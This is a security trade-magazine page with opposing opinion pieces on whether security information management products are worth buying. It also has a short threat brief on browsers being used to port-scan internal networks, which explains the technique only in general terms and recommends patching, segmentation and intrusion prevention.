FOR
by Tracy Hulver, vice president of product management and marketing, netForensics

Security information management (SIM) technology provides enterprises with a powerful solution to address today's complex risk management and compliance challenges. SIM has become a proven security strategy for securing corporate resources, protecting valuable information and meeting regulatory requirements. SIM is strategically positioned in the heart of the security infrastructure to incorporate information from strategic applications and critical compliance-related assets, as well as the perimeter devices that protect them. With an effective SIM solution, companies can gauge whether they are improving their overall risk posture and effectively addressing organizational security policies.

 SIM offers a flexible solution for tying together the array of disparate security technologies. SIM solutions rationalize volumes of raw security data from all types of sources in a concise process. This security-related data is transformed into security intelligence that can be used to drive decisions regarding appropriate mitigation and remediation.

 

AGAINST
by Mike Rothman, president and principal analyst, Security Incite

Enterprise customers are definitely looking for solutions to help them manage their security environment more effectively. They need to understand what is happening and, more importantly, what they should be doing to fix any potential issues. But they need this to happen at near real-time because in an attack situation, the clock is ticking. They also need to store that log data in a way that ensures forensic integrity.

Lots of folks want to talk about compliance also, but the reality is that documentation about process and programs, with a demonstration of the controls in place suffices. Anything more than that is overkill.

The problem is that today's current generation of security information management (SIM) products don't meet those needs. They are big, expensive and require a tremendous amount of integration.

Customers are better off devoting some resources to a log management platform to give them 80 percent of what they need at 20 percent of the cost.

 

THREAT OF THE MONTH
Portscanning

What is it?
Techniques have recently been developed for turning a user's web browser into a portscanning engine which can be used by an attacker to remotely enumerate servers and services running on the internal network, bypassing the firewall.

How does it work?
An attacker sets up a website and entices corporate users to visit it. The HTML on the website then causes the browser to send probes to common internal network IP address ranges, then reports the results of the probes back to the attacker's web server. In this way the browser becomes a proxy into the network.

Should I be worried?
Enumerating services in and of itself is not an attack, but can be a precursor to one. An attack using the browser as a proxy might be more likely to work if the servers on the internal network have not been given the same priority in being patched for software vulnerabilities as external servers.

How can I prevent it?
When patching software vulnerabilities on internal servers, give consideration to how the services might be accessed by workstations that also have internet access. Firewall user workstations from internal server networks and only permit access to those services specifically required. Deploy portscanning/intrusion prevention on all network segments, whether they are internet-connected or not.

— Joe Stewart, senior researcher, SecureWorks (formerly LURHQ)